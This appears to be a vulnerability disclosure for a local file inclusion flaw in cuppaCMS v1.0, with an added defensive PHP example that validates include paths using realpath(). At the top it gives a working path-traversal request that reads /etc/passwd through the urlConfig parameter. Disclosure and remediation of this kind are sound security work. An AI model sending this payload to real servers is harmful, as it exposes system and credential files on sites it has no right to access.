POST /alerts/alertConfigField.php
urlConfig=../../../../../../../../../../../../../../etc/passwd
analysis
location: /alerts/alertConfigField.php line 77

<?php include "../components/table_manager/fields/config/".@$cuppa->POST("urlConfig"); ?>

and $cuppa->POST
// post
public function POST($string){
    return $this->sanitizeString(@$_POST[$string]);
}
go on
public function sanitizeString($string){
    return htmlspecialchars(trim(@$string));
}
So the POST parameter urlConfig is used without any LFI protection filter.
Repair suggestions
You can check urlConfig, for example check whether it contains .. and then refuse the request.
Product version: cuppaCMS v1.0 http://cuppacms.com/files/cuppa_cms.zip
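
An added example, not part of the original report and not Cuppa CMS code: it shows that the report's `sanitizeString()` leaves `../` untouched, next to one way to constrain the include. Instead of only matching `..` as the report suggests, it canonicalizes the path with `realpath()` and requires the result to stay inside the base directory. `resolveConfigField()`, the temp directory layout and the sample inputs are hypothetical and constructed for the demo.

```php
<?php
// Added example (not Cuppa CMS code). resolveConfigField() and the temp
// directory layout are hypothetical names constructed for this demo.

// Mirrors the report's sanitizeString(): HTML-escapes, but leaves "../" untouched.
function sanitizeString($string) {
    return htmlspecialchars(trim((string)$string));
}

// Returns the canonical path of $userValue inside $baseDir, or null if the
// value escapes the directory, does not exist, or is not a regular file.
function resolveConfigField(string $baseDir, string $userValue): ?string {
    $base = realpath($baseDir);
    if ($base === false || strpos($userValue, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks; false if the file is missing.
    $target = realpath($base . DIRECTORY_SEPARATOR . $userValue);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Trailing separator prevents "/config_evil" from matching "/config".
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Constructed sandbox: config/text.php is allowed, secret.txt sits outside it.
$root = sys_get_temp_dir() . "/lfi_demo_" . getmypid();
mkdir("$root/config", 0700, true);
file_put_contents("$root/config/text.php", "<?php echo 'field ok'; ?>");
file_put_contents("$root/secret.txt", "outside the config directory");

$inputs = ["text.php", "../secret.txt", "missing.php"];  // constructed sample values
foreach ($inputs as $raw) {
    $clean = sanitizeString($raw);                        // "../" survives this step
    $path  = resolveConfigField("$root/config", $clean);
    printf("%-16s sanitized=%-16s -> %s\n", $raw, $clean,
           $path === null ? "rejected" : "include $path");
}

// Clean up the sandbox.
unlink("$root/config/text.php");
unlink("$root/secret.txt");
rmdir("$root/config");
rmdir($root);
```

Where the set of field templates is fixed, an explicit allowlist of file names is stricter than any path check.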